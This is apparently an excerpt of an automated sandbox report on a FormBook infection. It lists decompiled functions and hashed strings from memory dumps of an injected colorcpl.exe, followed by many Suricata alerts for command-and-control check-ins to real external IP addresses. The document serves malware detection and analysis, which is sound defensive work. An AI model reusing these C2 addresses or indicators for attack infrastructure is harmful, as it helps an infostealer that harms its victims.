@@@@, xrefs: 0558DFDF
@@@@, xrefs: 0558E0CD
4567, xrefs: 0558DFCA
@@@@, xrefs: 0558E0AA

Memory Dump Source

Source File: 00000007.00000002.4488644387.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5580000_colorcpl.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 9f04e1dc506f42f0de9fd4ca82da11d9677e0e2421fe9a9fa01c9eac5faa3e7b
Instruction ID: 8f1b6dcef021cdaa9f05b45a491ea3de02f5eb7e6c66b5a689e6b419f5ec8117
Opcode Fuzzy Hash: 9f04e1dc506f42f0de9fd4ca82da11d9677e0e2421fe9a9fa01c9eac5faa3e7b
Instruction Fuzzy Hash: 67915FF04082988AC7158F55A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85

Function 052A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 052A293C
___swprintf_l.LIBCMT ref: 052A295E
___swprintf_l.LIBCMT ref: 052A29A3
___swprintf_l.LIBCMT ref: 052DA52E

Strings

ffff:, xrefs: 052DA504
::ffff:0:%u.%u.%u.%u, xrefs: 052DA54E
:%u.%u.%u.%u, xrefs: 052DA5B8
::%hs%u.%u.%u.%u, xrefs: 052DA527

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: dd08d76dbab8faf5fb492b6817554e64f9449cec3a10b9d7837f6bd2e8befbea
Instruction ID: 5c25954d71bc8606cd462a0b8073a82e61e32a1b009dbb79d6ad9cda8ea1d01f
Opcode Fuzzy Hash: dd08d76dbab8faf5fb492b6817554e64f9449cec3a10b9d7837f6bd2e8befbea
Instruction Fuzzy Hash: A751E5BAB24117BFCB20DFA889C097EF7B9BF08740B508669E469D7641D374DE0087A0

Function 05312410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 053124A6
___swprintf_l.LIBCMT ref: 053124E2
___swprintf_l.LIBCMT ref: 0531257D
___swprintf_l.LIBCMT ref: 053125A3
___swprintf_l.LIBCMT ref: 053125C8
___swprintf_l.LIBCMT ref: 05312608

Strings

ffff:, xrefs: 0531247D, 0531249D
:%u.%u.%u.%u, xrefs: 053125FF
::%hs%u.%u.%u.%u, xrefs: 0531249E
::ffff:0:%u.%u.%u.%u, xrefs: 053124DA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: da77b9c52daac271db6915a53e24aea684372f3cdb67c6e37daa56c7085cc15b
Instruction ID: 0a315660aa3175e98068ca698a15ee4f51ee786a3f02fac80db999ab0e5226a7
Opcode Fuzzy Hash: da77b9c52daac271db6915a53e24aea684372f3cdb67c6e37daa56c7085cc15b
Instruction Fuzzy Hash: DA510879A00645AEDB38DF6EC89097FF7FAFF44340B048859F896C7641EAB4DA408764

Function 05297630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 052D4742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 052D4655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052D46FC
CLIENT(ntdll): Processing section info %ws..., xrefs: 052D4787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 052D4725
ExecuteOptions, xrefs: 052D46A0
Execute=1, xrefs: 052D4713

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: a58070a75170af8e11e0a085bf17b347e9281563598c238bdd42665e4b2f0dc2
Instruction ID: bf37e4624147ec35148e2cccd07bfbdc95a7b14d51ba1fc88c426be81c11273b
Opcode Fuzzy Hash: a58070a75170af8e11e0a085bf17b347e9281563598c238bdd42665e4b2f0dc2
Instruction Fuzzy Hash: C8510A367302597AEF18EBA4DC49FF977A9FF45304F080099E509AB290EB709A41CF50

Function 05583BD1 Relevance: 13.8, Strings: 11, Instructions: 54COMMON

Download Yara Rule

Strings

VWVG, xrefs: 05583C4E
QIWN, xrefs: 05583C32
G)3G, xrefs: 05583C0F
QIWI, xrefs: 05583C7F
UQIW, xrefs: 05583C63
G0(0, xrefs: 05583C1D
RIWG, xrefs: 05583BFA
WVWW, xrefs: 05583C47
QS\G, xrefs: 05583C24
WIU, xrefs: 05583C86
QIU\, xrefs: 05583C16

Memory Dump Source

Source File: 00000007.00000002.4488644387.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5580000_colorcpl.jbxd

Similarity

API ID:
String ID: G)3G$G0(0$QIU\$QIWI$QIWN$QS\G$RIWG$UQIW$VWVG$WIU$WVWW
API String ID: 0-3237216922
Opcode ID: 0101aa6a1e9d4250d2d5c20a9ff30ae71b440874b8718c4f298eb99cbf6dd478
Instruction ID: 7b99a2783742c780a7f448eacccb3e979489b103301e014848c07fcd131214af
Opcode Fuzzy Hash: 0101aa6a1e9d4250d2d5c20a9ff30ae71b440874b8718c4f298eb99cbf6dd478
Instruction Fuzzy Hash: 3121EDB0C1468D9ACB10EF92D9996EEFFB1FB04308F258058C969AB650C7755A4A8F80

Function 05336940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 6e79582cb711646c142bd3e4a1f205cd75b841f2906735929f5ce866f360731b
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: AC0224B1608341AFD309DF18C596A6BBBE5FFC8700F048A2DB9958B264DB71E905CB52

Function 052AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 052AB6BF

Strings

+, xrefs: 052AB65A
0, xrefs: 052AB66F
0, xrefs: 052AB695
-, xrefs: 052AB650

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: d4db9adeed4e4241c39541e3e23e5956dddee4d7bedbccca6a83129f572d19e0
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 1581D433E2524A9FDF25CF68C891BFEBBB2BF85710F184259D8A5A7291C7749840CB50

Function 053120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0531214F
___swprintf_l.LIBCMT ref: 05312172

Strings

%%%u, xrefs: 05312146
]:%u, xrefs: 05312169
[, xrefs: 0531212B

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: a2ca796cbbc76a00c2212898c2b2e9efecf5789c750887371e947751a5b893a0
Instruction ID: e5f608e68df8427bb95fbafb5bdec89f61819a6f2391a5e2ce532f15dc1a58c9
Opcode Fuzzy Hash: a2ca796cbbc76a00c2212898c2b2e9efecf5789c750887371e947751a5b893a0
Instruction Fuzzy Hash: D721537AE10119ABDB14DF7ACC44AFFB7E9AF54654F040126FD05E3200EB70D9018BA5

Function 0528F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052D02E7
RTL: Re-Waiting, xrefs: 052D031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052D02BD

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: d41c2e305c01b3f58d21873cedbdfba867d9a0732c6e455681113cec707c5147
Instruction ID: 2b34eb5319f0cb8987a20657e108f6bad5eb2589c40f1a11965c3eac688e8b7f
Opcode Fuzzy Hash: d41c2e305c01b3f58d21873cedbdfba867d9a0732c6e455681113cec707c5147
Instruction Fuzzy Hash: C1E1D430629742DFD725DF68C988B2AB7E1BF84314F140A1DF5A98B2E0E774E844CB52

Function 0529BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 052D7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 052D7B7F
RTL: Re-Waiting, xrefs: 052D7BAC

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 0d418838fc518d52017659559c0dda809ac1a16bb19565d9cbf0be042581b355
Instruction ID: bf4365e341342f05ccb425c1068aa8d7d5a39829cc2ed1c8b6973ab04327b91a
Opcode Fuzzy Hash: 0d418838fc518d52017659559c0dda809ac1a16bb19565d9cbf0be042581b355
Instruction Fuzzy Hash: 8441E5353287039FCB24DE25D840B6AB7E6FF88710F100A2DF95A9B780D771E8058B91

Function 0529B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 052D728C

Strings

RTL: Resource at %p, xrefs: 052D72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 052D7294
RTL: Re-Waiting, xrefs: 052D72C1

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 4117bf1ac7592ee3a2aae9ac5c37bf5eaf5d5b5ef2bb2f1b436ea400e6b9ec86
Instruction ID: dbb8a8b024cad05bcc77d6e993559f74290fde6a43934a748250d835dfbcf427
Opcode Fuzzy Hash: 4117bf1ac7592ee3a2aae9ac5c37bf5eaf5d5b5ef2bb2f1b436ea400e6b9ec86
Instruction Fuzzy Hash: EC411071724242ABCB24DE24CC45F6AB7A6FF84710F140619F959AB340DB30F802DBE0

Function 05312300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0531238D
___swprintf_l.LIBCMT ref: 053123B3

Strings

%%%u, xrefs: 05312384
]:%u, xrefs: 053123AA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: ac9e087efe2b64d18713f464b2b75dd2dd68f92370fb54c21b05f838d145e142
Instruction ID: 54968a78bffa8fa75acd96a4b705a0bf4c57ce8b27d250bc676c130d42658011
Opcode Fuzzy Hash: ac9e087efe2b64d18713f464b2b75dd2dd68f92370fb54c21b05f838d145e142
Instruction Fuzzy Hash: D7317176A10219AFDB24DE79CC44BEFB7A8BF44750F440956FC49E3200EB70AA548BA4

Function 052A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 052A7E8B

Strings

-, xrefs: 052A7DDD
+, xrefs: 052A7DE8

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 13ca16a774fc57b839835c62e91eb92e2d7253a1ec453ce3f2997940bf06ffdd
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 1691B472F242079BDF24DF69C980ABEB7A6FF44320F18451AE959E72C0D7709A418B58

Function 05269126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 05269175
$, xrefs: 05269191

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 6ba2d09044d22f08f5922f756c4bc5a79ca633b64b1c675489c39acc348ee940
Instruction ID: a92008963e78e3219779414f4cd966e59546ea228c88587bfd5369e013c11001
Opcode Fuzzy Hash: 6ba2d09044d22f08f5922f756c4bc5a79ca633b64b1c675489c39acc348ee940
Instruction Fuzzy Hash: 75810A75D10269DBDB25DB54CC45BEEBBB8AF08750F1041EAA91DB7280EB705E84CFA0

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then xor eax, eax		7_2_03049DC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_055804E0

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49791 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49881 -> 141.193.213.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49896 -> 141.193.213.10:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49927 -> 141.193.213.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49959 -> 8.210.3.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49975 -> 8.210.3.99:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49989 -> 8.210.3.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 103.71.154.12:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49993 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 8.210.3.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 178.79.184.196:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50001 -> 103.71.154.12:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 178.79.184.196:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 178.79.184.196:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50030 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50021 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49997 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50009 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50037 -> 103.191.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50034 -> 103.191.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50031 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50017 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49912 -> 141.193.213.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50005 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50025 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 103.71.154.12:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50013 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50033 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50029 -> 178.79.184.196:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 103.71.154.12:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50036 -> 103.191.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50035 -> 103.191.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 162.0.215.244:80
